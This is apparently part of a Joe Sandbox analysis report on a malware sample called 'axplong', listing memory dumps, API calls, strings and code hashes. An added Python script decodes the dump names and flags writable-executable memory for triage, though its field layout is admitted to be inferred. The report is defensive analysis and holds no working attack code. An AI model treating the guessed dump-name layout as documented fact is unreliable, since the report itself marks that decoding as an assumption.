                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4F$fed3aa
                                        • API String ID: 0-4214077434
                                        • Opcode ID: c41d1584371f665062b7117f6d64f8881460b0ea602013afde0631c37c722984
                                        • Instruction ID: 08e063baca76260160a724aa80f2e819dcc0d914e59bf8318668ea39bec56645
                                        • Opcode Fuzzy Hash: c41d1584371f665062b7117f6d64f8881460b0ea602013afde0631c37c722984
                                        • Instruction Fuzzy Hash: 45721770904248DBEF14EF69C9497DE7BB5AB42308F50819EE804273C2D77D9A88CBD6
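The dump file names in the entries above encode the memory region each function was lifted from: the entries marked "based on PE: false" come from the private region at 0x04B30000, the ones marked "based on PE: true" from the image mapped at 0x00400000. The following Python is an added example, not part of the Joe Sandbox report or its tooling. It decodes those names using the documented Win32 PAGE_* and MEM_* constants; the positional field layout (process index, snapshot phase, sequence number, base address, protection, an undecoded field, memory type, an undecoded field) is an assumption inferred from the names on this page, not something the report documents, and the two undecoded fields are kept raw.

```python
"""Decode Joe Sandbox .sdmp dump names as they appear in the
'Source File' / 'Associated' entries of this report.

Added example, not Joe Sandbox code. ASSUMPTION: the dotted field
layout below was inferred from the dump names on this page; only the
protection and memory-type fields are interpreted, via the standard
Win32 constants from winnt.h.
"""
import re
from dataclasses import dataclass

# Win32 page protection constants (low byte of the protection value).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: proc.phase.seq.base.protect.<raw>.memtype.<raw>.sdmp
_NAME_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<f5>[0-9A-Fa-f]{8})\.(?P<memtype>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    phase: int
    sequence: str
    base: int
    protect: int
    memory_type: int
    raw_fields: tuple  # the two fields this example does not interpret

    @property
    def protect_name(self) -> str:
        base = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:X}")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([base] + mods)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.memory_type, f"0x{self.memory_type:X}")

    @property
    def is_image_backed(self) -> bool:
        return self.memory_type == 0x1000000

    @property
    def is_writable_executable(self) -> bool:
        return (self.protect & 0xFF) in (0x40, 0x80)


def parse_dump_name(name: str) -> DumpRegion:
    m = _NAME_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox sdmp name: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16),
        phase=int(m["phase"], 16),
        sequence=m["seq"],
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        memory_type=int(m["memtype"], 16),
        raw_fields=(m["f5"], m["f7"]),
    )


def classify(region: DumpRegion) -> str:
    """Triage label. Writable+executable memory that is not image-backed is
    where unpacked or injected code usually lives; writable+executable pages
    inside an image mapping mean section rights were changed after load."""
    if region.is_writable_executable and not region.is_image_backed:
        return "rwx-private"
    if region.is_writable_executable:
        return "rwx-image"
    return "normal"


# Dump names copied from this report (process 6, second snapshot).
REPORT_DUMPS = [
    "00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp",
    "00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp",
]


def triage(names=REPORT_DUMPS):
    """Return (base, protection, type, label) rows, most suspicious first."""
    order = {"rwx-private": 0, "rwx-image": 1, "normal": 2}
    rows = []
    for n in names:
        r = parse_dump_name(n)
        rows.append((f"0x{r.base:08X}", r.protect_name, r.type_name, classify(r)))
    return sorted(rows, key=lambda row: order[row[3]])


if __name__ == "__main__":
    for row in triage():
        print(*row, sep="  ")
```

Run stand-alone it lists the 0x04B30000 region first as PAGE_EXECUTE_READWRITE / MEM_PRIVATE, which is the region the Opcode IDs without a PE backing were taken from; the 0x00401000 and 0x00728000 image pages show up as writable-executable image memory, consistent with the "changes PE section rights" signature in the overview.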
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 784bff45f8f49f2def9249729d82457de812e3bb94133e4cdb9e8def7e48ce0b
                                        • Instruction ID: 2066767563f3fddc5d97533bc8764efe4d7c441cd557993124edbe2cc9b284d6
                                        • Opcode Fuzzy Hash: 784bff45f8f49f2def9249729d82457de812e3bb94133e4cdb9e8def7e48ce0b
                                        • Instruction Fuzzy Hash: D3C24B71E046288FEB25CE28DD407EAB3B5EB88705F1441EBD84DE7241E778AE858F45
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                        • Instruction ID: 9d4bdb5ccac2ccd1b8dc71bdcb067ae9d6b9e215744f4a6413e295b09c0aabfa
                                        • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                        • Instruction Fuzzy Hash: 08F17F71E002199FEF14CFA8C9806AEB7B1FF48314F65826EE819A7344D775AE01CB94
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID: 'kAd+F$'kAd+F
                                        • API String ID: 2659868963-4062534957
                                        • Opcode ID: b7d8164ecb7e52df6172856850afd380580e4efa302df6d9fb0d205962daf496
                                        • Instruction ID: 547416985bd4f868297ffbe0f0216cdae021c0110cf0fca0dafd29e064ac5b6b
                                        • Opcode Fuzzy Hash: b7d8164ecb7e52df6172856850afd380580e4efa302df6d9fb0d205962daf496
                                        • Instruction Fuzzy Hash: 45518CB2D00A059FDB15CF59E9917AAB7F0FB08314F24857BD805EB290E7B89980CF59
                                        APIs
                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,0041CE82,?,?,?,?,0041CEB7,?,?,?,?,?,?,0041C42D,?,00000001), ref: 0041CB33
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FilePreciseSystem
                                        • String ID:
                                        • API String ID: 1802150274-0
                                        • Opcode ID: 68c5d3f3c5713d6b451e02c0651836a54563cda753970ec3fcd6083d356eea10
                                        • Instruction ID: efa448efb547846e03340df787e61ade6f8131aab23137c646f3263fdfc1d7ce
                                        • Opcode Fuzzy Hash: 68c5d3f3c5713d6b451e02c0651836a54563cda753970ec3fcd6083d356eea10
                                        • Instruction Fuzzy Hash: 58D0223258A138A3CA013B95FD088EDBB099B00B107001223EA08A32208AD0BC818BEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                        • Instruction ID: 163a767fe777519a336abb6a8608aa8ab8698e92fa1e8424b7b8926d05cfaa85
                                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                        • Instruction Fuzzy Hash: A45176F020C60856DB388A2888967BFA79AAF1D304F14745FE4C2D7782DA1DDD45835E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
                                        • Instruction ID: c1641910f5f068dbc83447083763bac080b9dc3ce95cc9405730afd006aa50db
                                        • Opcode Fuzzy Hash: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
                                        • Instruction Fuzzy Hash: BE225FB3F515145BDB0CCA5DDCA27ECB2E3AFD8218B0E813DA40AE3345EA79D9158648
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c9aedf241bf446047dbacece75ad246861375fca58e40f88bb4413c4137128c
                                        • Instruction ID: e78e5dceadc69e8d34e7ae94ecde935e9b80c4c3860b7a1a4dfc010e184d8fd3
                                        • Opcode Fuzzy Hash: 1c9aedf241bf446047dbacece75ad246861375fca58e40f88bb4413c4137128c
                                        • Instruction Fuzzy Hash: 84B14B31214609DFE715CF28C486B667BE0FF45364F29865AE899CF3A1C739E982CB44
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8302636fc594eee82004d29337068400af1688650941fed2d2919b055d37df22
                                        • Instruction ID: f4585b54881e19f122f9b8f661dd75a17d13245182382e038b4398489ec82c6a
                                        • Opcode Fuzzy Hash: 8302636fc594eee82004d29337068400af1688650941fed2d2919b055d37df22
                                        • Instruction Fuzzy Hash: D051D17160C3918FD319CF2DD51523ABBF1AFCA200F084A9EE1D697282DB74DA44CB92
                                        Similarity
                                        • Opcode ID: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
                                        • Instruction ID: dbced400732ba9141d266082b421f4ae55b9bfa50d32b7e96a0ab320e2958a10
                                        • Opcode Fuzzy Hash: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
                                        • Instruction Fuzzy Hash: 5821B673F204394B770CC57E8C5727DB6E1C68C541745423AE8A6EA2C1D968D917E2E4
                                        Similarity
                                        • Opcode ID: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
                                        • Instruction ID: 8adb704d06a20227484a0a755470295a3b473a6cf211df661a285394344b343c
                                        • Opcode Fuzzy Hash: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
                                        • Instruction Fuzzy Hash: 2B117723F30C255A775C816D8C1727AA5D6DBD825071F533AD826E7284E994DE23D290
                                        Similarity
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: 58cfbb8d41375cad285e1c6da808350295a6b31344476fb849924744dafde05b
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: CE11087B20014147F604862DCDF46BFB796EAC5325B3C437FD1414B758DE2AA945D908
                                        Similarity
                                        • Opcode ID: 760ae38ac6910a75ea3fa425d462fe70d88435284ea8fb526c81d7c8047a0e8c
                                        • Instruction ID: 9b65c7c9ebc653f73c8fe90dcd68fd9ec49f231335bab6ae1ce3c91c085a4dab
                                        • Opcode Fuzzy Hash: 760ae38ac6910a75ea3fa425d462fe70d88435284ea8fb526c81d7c8047a0e8c
                                        • Instruction Fuzzy Hash: 74E08C30440648BFDE2A7B25D9499593B5AEF26348F01A805FC1886231CBAAFC91CA88
                                        Similarity
                                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                        • Instruction ID: d5b12ebd6edf886f4495bd99fbd257c2c9a1e31a863b1e18c0003e09dd8ddbfb
                                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                        • Instruction Fuzzy Hash: 71E04632951228EBCB25DB898904E8AF2ACEB48B44F15409BB501D3240C674DF00C7D4
                                        APIs
                                        • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0041795C
                                        • __Cnd_destroy_in_situ.LIBCPMT ref: 00417968
                                        • __Mtx_destroy_in_situ.LIBCPMT ref: 00417971
                                        Similarity
                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                        • String ID: 'kAd+F$@yA$d+F
                                        • API String ID: 4078500453-941499601
                                        • Opcode ID: 9e9bc346933c8e8847e7fdd1bf328f586cc5a8bd82eecadce4ea095dfa148acf
                                        • Instruction ID: 306fe0eea3f67382258af3fc1d0e87d4e1c23e42ddf082fa83b7bc71e39c2db3
                                        • Opcode Fuzzy Hash: 9e9bc346933c8e8847e7fdd1bf328f586cc5a8bd82eecadce4ea095dfa148acf
                                        • Instruction Fuzzy Hash: 0631D5B19147049BE720DF69D845A97B7F8EF18314F00062FE945C7242E779EA8887A9
                                        Similarity
                                        • API ID: _wcsrchr
                                        • String ID: .bat$.cmd$.com$.exe
                                        • API String ID: 1752292252-4019086052
                                        • Opcode ID: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                                        • Instruction ID: 3f9e57f235a537d8eb8cd6a3688bad566dd464967c1f6f53d06d5f0f0e70acd6
                                        • Opcode Fuzzy Hash: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                                        • Instruction Fuzzy Hash: 9B01DBB7608616666A2864199C0373B17989F8BBB9F25102FFE84F73C2DE8DDC02459C
                                        Similarity
                                        • API ID: Mtx_unlock$Cnd_broadcast
                                        • API String ID: 32384418-0
                                        • Opcode ID: 549a4120e473c01e737fc2ff19ca4dbab941edc78c01f4c79017b19d3615c414
                                        • Instruction ID: c6b99eb4f312bd14da5918741c5b6ea93bda90abce3632f83f5614099349358f
                                        • Opcode Fuzzy Hash: 549a4120e473c01e737fc2ff19ca4dbab941edc78c01f4c79017b19d3615c414
                                        • Instruction Fuzzy Hash: A1A1DFB1941206AFDB11DF65C9457ABBBA8AF05319F00413EE815E7381EB38EA44CB99
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00402806
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 004028A0
                                        Similarity
                                        • API ID: ___std_exception_copy___std_exception_destroy
                                        • String ID: P#@$P#@
                                        • API String ID: 2970364248-3974838576
                                        • Opcode ID: e35e6aeac92239f282d009e65dfccbf2cff649b47829befc4f3ff50070572f90
                                        • Instruction ID: 0c763ef230728e70a8537f3ccbfc0b031f153f472b9f47e90a79a27d972d902c
                                        • Opcode Fuzzy Hash: e35e6aeac92239f282d009e65dfccbf2cff649b47829befc4f3ff50070572f90
                                        • Instruction Fuzzy Hash: 8E719471D002089BDB04DF98C985BDDFBB5EF59314F14822EE805B7385E778A984CBA9
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID: P#@$P#@$This function cannot be called on a default constructed task
                                        • API String ID: 2659868963-4211761357
                                        • Opcode ID: eb3ecc81248d021a59e2495ef6ef31f31518cd35b49ec59c95d56401cab6c6f0
                                        • Instruction ID: 9c613ddfb020e27d5d18226a6da53c9ba12c3d1a084fd06ddee43e789d326886
                                        • Opcode Fuzzy Hash: eb3ecc81248d021a59e2495ef6ef31f31518cd35b49ec59c95d56401cab6c6f0
                                        • Instruction Fuzzy Hash: 41F0F670A1030CABC710DFA998419DEB7ED9F04305F1081AFFC04A7241EBB4AA88CB9D
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
